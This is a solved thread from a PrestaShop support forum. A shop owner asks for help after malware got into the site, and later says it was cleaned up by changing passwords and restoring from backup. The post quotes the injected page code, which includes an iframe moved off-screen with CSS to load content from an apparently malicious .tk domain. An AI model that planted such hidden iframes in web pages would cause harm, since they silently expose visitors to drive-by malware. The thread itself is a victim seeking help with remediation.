Jump to content

[SOLVED] My Site is Infected with Malware


Recommended Posts

I have got this script injected into my site and now my site is blocked by Google. Please help me how to get rid of it.

I'm using PS 1.3.2. I have to put my site under maintenance now.

 

I can't find any files that are recently modified except those inside smarty/compile folder. I tried to delete but everytime I put my site back up, there are always another set of new files created few minutes later.

 

TIA,

boy

 

 <link rel="icon" type="image/vnd.microsoft.icon" href="http://www.lens-page.com/img/favicon.ico" />
 <link rel="shortcut icon" type="image/x-icon" href="http://www.lens-page.com/img/favicon.ico" />
 <link href="/themes/prestashop/css/global.css" rel="stylesheet" type="text/css" media="all" />
  <script type="text/javascript" src="http://www.lens-page.com/js/tools.js"></script>
  <style>.lpv9tbu6 { position:absolute; left:-1864px; top:-1162px} </style>
  <div class="lpv9tbu6"><iframe src="http://hipdiaewew.tk/46964443.html" width="209" height="351"></iframe></div> 
 <script type="text/javascript">
  var baseDir = 'http://www.lens-page.com/';
  var static_token = 'ca8f837ddd2863e561d8ab7de9d1146f';
  var token = 'b4f125c07e97fe640e54a39991e73e79';
  var priceDisplayPrecision = 2;
  var roundMode = 2;
 </script>

Link to comment
Share on other sites

Thanks Mike, and yes I have changed all of the passwords, cpanel, ftp, database, and all of my employee's passwords. So far I managed to restore it and it seems that the Malware is gone for now.

 

I'm planning for upgrade now.

 

Thanks everyone.

 

~Boy

Link to comment
Share on other sites

×
×
  • Create New...